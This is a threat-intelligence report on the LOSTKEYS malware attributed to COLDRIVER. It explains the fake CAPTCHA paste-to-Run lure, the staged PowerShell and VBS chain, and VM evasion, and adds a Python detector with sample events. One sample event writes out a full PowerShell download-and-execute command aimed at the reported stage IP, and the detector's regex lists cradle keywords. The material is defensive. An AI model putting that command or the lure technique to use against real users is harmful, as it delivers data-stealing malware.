COLDRIVER Deploying LOSTKEYS Malware To Target Governments And NGOs


Summary
Google Cloud has discovered a new malware strain called LOSTKEYS, linked to the Russian government-backed threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto). LOSTKEYS can steal files from specific directories, collect system information, and send a list of running processes to the attackers. It was observed in multiple attacks in early 2025 and represents an escalation in COLDRIVER's capabilities, expanding beyond the group's usual focus on credential phishing.
COLDRIVER typically targets high-profile individuals, including government and military advisors, journalists, think tanks, and NGOs, often through personal or organizational email accounts. After compromising accounts, they exfiltrate emails and contact lists, and sometimes deploy malware like LOSTKEYS to access local files.
The group's operations appear to support Russian strategic intelligence goals, with recent campaigns continuing to focus on individuals connected to Ukraine. COLDRIVER has also been linked to limited hack-and-leak operations targeting officials and organizations in the UK.
Technical Analysis
LOSTKEYS is deployed at the final stage of a multi-step infection chain that begins with a lure website featuring a fake CAPTCHA. After the user “verifies” the CAPTCHA, a PowerShell command is automatically copied to their clipboard, and the site instructs the user to paste and run the command using the Windows “Run” prompt.
Figure 1 – Fake CAPTCHA verification (Source – Google Cloud)
The initial PowerShell script that is pasted will download and execute the second stage. In several observed instances, the second stage was retrieved from the IP address 165.227.148[.]68.
The second stage computes the MD5 hash of the device's display resolution, and if the hash matches one of three specific values, it halts execution. If the hash is different, it proceeds to retrieve the third stage. This step is likely intended to avoid execution in virtual machines. Each observed instance of this infection chain uses distinct, unique identifiers that must be included in the request to obtain the next stage. In all cases, the third stage is retrieved from the same host as the previous stages.
The third stage of the infection chain is a Base64-encoded blob which, when decoded, reveals additional PowerShell code. This code is responsible for retrieving and decoding the final payload. It does so by downloading two more files from the same host as the previous stages, each requested with identifiers that are unique to that infection chain.
The first file is a Visual Basic Script (VBS) referred to as the "decoder," which decodes the second file. The decoding process uses two unique keys per infection chain. One key is embedded in the decoder, while the second key is stored in the third stage. These keys are applied in a substitution cipher to decode the payload, and each infection chain uses different keys.
The final outcome of the infection chain is a Visual Basic Script (VBS) known as LOSTKEYS. This malware is designed to steal files from a predefined list of file extensions and directories, as well as to transmit system information and details about running processes to the attacker.
Figure 2 – LOSTKEYS infection flow (Source – Google Cloud)
During the investigation, two additional samples dating back to December 2023 were identified, both leading to the execution of LOSTKEYS. Unlike the recent infection chain, these samples are Portable Executable (PE) files masquerading as Maltego software. It remains unclear whether these older samples are linked to COLDRIVER or if the malware was reused from another source.
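Detection logic for the delivery chain described above, written here as an added example (it is not Google Cloud's or FPT Metrodata's code). It scores constructed process-creation events for the observable stages: PowerShell started from the Run prompt (parent explorer.exe) with a download cradle, contact with the reported second-stage host, and a VBS decoder or LOSTKEYS payload launched through wscript/cscript from PowerShell. The event field names, the sample events and the placeholder identifier in the URL are assumptions.

```python
import re

STAGE_HOST = "165.227.148.68"  # second-stage IP reported on the page

# Tokens typical of clipboard-pasted PowerShell download cradles.
CRADLE = re.compile(
    r"(invoke-webrequest|iwr\b|iex\b|invoke-expression|downloadstring|-enc\w*\s)", re.I)
PS_IMAGES = ("powershell.exe", "pwsh.exe")


def score_event(ev: dict) -> list[str]:
    """Return the detection reasons that apply to one process-creation event."""
    reasons = []
    image = ev.get("image", "").lower()
    parent = ev.get("parent_image", "").lower()
    cmd = ev.get("command_line", "")
    is_ps = image.endswith(PS_IMAGES)
    # Stage 1: the user pastes the command into the Run prompt, so PowerShell's
    # parent is explorer.exe rather than cmd.exe, a terminal or a script host.
    if is_ps and parent.endswith("explorer.exe") and CRADLE.search(cmd):
        reasons.append("powershell download cradle launched from Run prompt")
    if STAGE_HOST in cmd:
        reasons.append("command line references known stage host")
    # Later stages: PowerShell runs the VBS decoder and, finally, LOSTKEYS itself.
    if image.endswith(("wscript.exe", "cscript.exe")) and parent.endswith(PS_IMAGES):
        reasons.append("script host spawned by powershell (VBS decoder/payload)")
    return reasons


def detect(events: list[dict]) -> dict[int, list[str]]:
    """Map event id -> reasons for every event that matched at least one rule."""
    return {ev["id"]: r for ev in events if (r := score_event(ev))}


# Constructed sample telemetry (Sysmon-style fields), not captured data.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "command_line": "explorer.exe"},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iwr http://165.227.148.68/ID-PLACEHOLDER | iex"'},
    {"id": 3, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"wscript.exe C:\Users\Public\decoder.vbs"},
    {"id": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell Get-ChildItem C:\logs"},  # benign admin use
]

if __name__ == "__main__":
    for event_id, why in detect(SAMPLE_EVENTS).items():
        print(event_id, "; ".join(why))
```

Event 4 shows why the parent-process condition matters: the same interpreter started from cmd.exe without a cradle produces no hit.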
Recommendations
Initial access takes place via phishing websites, such as the fake CAPTCHA lure described above. It is crucial to run commands and install software only from well-known and trusted sources, and never to paste commands supplied by a website into the Windows Run prompt.
Conduct awareness campaigns to educate users about the risks of phishing attacks and the importance of verifying the authenticity of VPN services.
Deploy advanced endpoint protection solutions that can detect and block malicious scripts and payloads across different operating systems. Ensure that these solutions are updated regularly to identify and mitigate new threats.
Use network security tools to monitor and block communications with known Command and Control (C&C) servers. Implement firewalls and intrusion detection systems to detect and prevent unauthorized access.
Enable MFA on all accounts to add an extra layer of security and reduce the risk of unauthorized access even if credentials are compromised.
Develop and maintain an incident response plan to quickly address and mitigate the impact of malware infections. Regularly test and update the plan to ensure effectiveness.
Conclusion
The discovery of LOSTKEYS highlights a significant evolution in COLDRIVER’s capabilities, shifting from credential phishing to more sophisticated malware deployment. The multi-stage infection chain, tailored identifiers, and use of evasion techniques indicate a well-resourced and adaptive threat actor. While the origins of earlier samples remain uncertain, the consistent goal appears to be intelligence collection in support of Russian strategic interests.